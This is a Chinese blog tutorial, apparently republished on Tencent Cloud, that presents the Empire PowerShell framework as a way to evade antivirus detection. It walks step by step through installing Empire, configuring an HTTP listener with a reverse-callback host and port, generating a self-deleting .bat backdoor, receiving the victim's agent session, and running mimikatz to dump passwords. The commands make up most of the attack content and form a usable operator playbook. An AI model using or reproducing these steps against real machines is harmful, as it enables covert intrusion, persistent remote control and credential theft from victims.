前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >内网渗透绕过查杀的一种新思路之Empire

内网渗透绕过查杀的一种新思路之Empire

作者头像
逍遥子大表哥
发布2021-12-17 18:34:10
5330
发布2021-12-17 18:34:10
举报
文章被收录于专栏:kali blog

介绍

昨天在github中看到一个项目,觉得有点意思,在这里写份教程。Empire一款基于PowerShell的后渗透测试工具。

安装

代码语言:javascript
复制
git clone https://github.com/EmpireProject/Empire.git

Empiresetup目录执行install.sh文件

代码语言:javascript
复制
./install.sh

最后设置数据库密码那里可以默认回车,也可以自己设置

踩坑

如果安装途中,遇到网络问题,多次执行./install.sh文件安装全部依赖,运行主目录下empire启动程序前,先执行setup目录下的reset.sh后再执行主目录empire文件。

使用

  • 监听
代码语言:javascript
复制
(Empire)> listeners  
  • 选择监听方式
代码语言:javascript
复制
(Empire: listeners) > uselistener http  
  • 查看需要配置的选项
代码语言:javascript
复制
Empire: listeners/http) > info    
  • 设置监听的名字
代码语言:javascript
复制
(Empire: listeners/http) > set Name backdoor

(Empire: listeners/http) > set Host http://192.168.80.131:4447             #设置木马反弹回连地址

(Empire: listeners/http) > set Port 4447 #设置本地监听端口
Empire: listeners/http) > execute     #执行监听

至此,监听工作完成。我们开始配置生成后门。

生成木马

代码语言:javascript
复制
(Empire: listeners/http) > back #返回上层模块
(Empire: listeners) > usestager windows/launcher_bat backdoor  #选择木马种类

这里我选择的是bat类型的脚本,当然你们可以选择其他的。后面的backdoor就是刚刚我们设置的监听,这个模块就是依据监听的配置信息,生成相应的木马,让反弹马找到连接主机。

代码语言:javascript
复制
(Empire: stager/windows/launcher_bat) > info     #查看需要配置的

你可以set OutFile 到你指定的目录(绝对路径)

代码语言:javascript
复制
(Empire: stager/windows/launcher_bat) > execute  #执行生成木马

拷贝运行木马、

弹出一个黑框后,它自动消失了,是因为我们刚才生成backdoor的时候其中一个选项delete设置的True,运行结束后删除自身。

点击完我们的backdoor之后,我们回到我们的机器可以看到已经获取到了客户端的一个会话。

代码语言:javascript
复制
(Empire: stager/windows/launcher_bat) > agents   #查看获取的代理会话

一个会话已经建立完成。

代码语言:javascript
复制
(Empire: agents) > rename HZFT7AX1 win7pro #更改会话名字
  • 建立会话
代码语言:javascript
复制
interact kali
  • 查看密码
代码语言:javascript
复制
mimikatz

更多命令,点击help

版权属于:逍遥子大表哥

本文链接:https://cloud.tencent.com/developer/article/1920898

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 介绍
  • 安装
  • 使用
  • 生成木马
相关产品与服务
网站渗透测试
网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档